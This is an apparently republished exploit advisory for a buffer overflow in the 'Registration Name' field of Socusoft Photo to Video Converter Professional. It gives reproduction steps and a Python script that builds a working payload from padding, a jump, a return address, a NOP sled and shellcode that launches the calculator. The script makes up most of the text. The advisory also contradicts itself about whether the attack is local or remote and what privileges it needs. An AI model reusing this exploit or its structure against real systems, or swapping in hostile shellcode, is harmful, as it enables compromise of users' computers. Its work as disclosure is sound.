Socusoft Photo to Video Converter Professional – « Regestration Name » Buffer Overflow Exploit

A local buffer overflow vulnerability has been discovered in the official Socusoft Photo to Video Converter Professional. The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. The vulnerability is marked as classic buffer overflow issue.

Product & Service Introduction:
===============================

Socusoft Photo to video converter Professional is the image to film conversion software that allows you to perform all kinds of slideshow videos (mp4, flv, mov, avi, mkv, mpeg, h.264 HD, 3gp, 3gpp2, swf ) playable on YouTube, Facebook, MySpace, iPod, iPad, iPhone, Archos, PSP, Zune.

(Copy of the Vendor Homepage: http://www.dvd-photo-slideshow.com/)

Date of Discovery:
==================

2018-09-13

Exploitation Technique:
=======================

Local & Remote

Platfom Tested:
===============

Windows 7

Solution – Fix & Patch:
=======================
Restrict the Set Output folder input by size and allocate the memory to deny to overflow the process by interaction with the vulnerable input field.

Levels Risk :

Proof of Concept (PoC):
=======================

The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue.

1.Download and install Photo to Video Converter Professional
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "" then go to Menu -> Help -> Save
4.Paste the contents of the file (poc.txt) into the input "Registration Name" and click "Activate"
5.Now the calculator executes!

#!/usr/bin/python

from struct import pack
buffer = "\x41" * 256
a = "\xeb\x06\xff\xff"
b = pack("<I",0x10015d71)
calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
nops = "\x90" * 20
c = "\x44" * 800

poc = buffer + a + b + nops + calc + c
file = open("poc.txt","w")
file.write(poc)
file.close()

print "POC Created by ZwX"
print " Email: msk4@live.fr"

References:
===========

[#] exploit-db.com
[#] packetstormsecurity.com
[#] cxsecurity.com

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*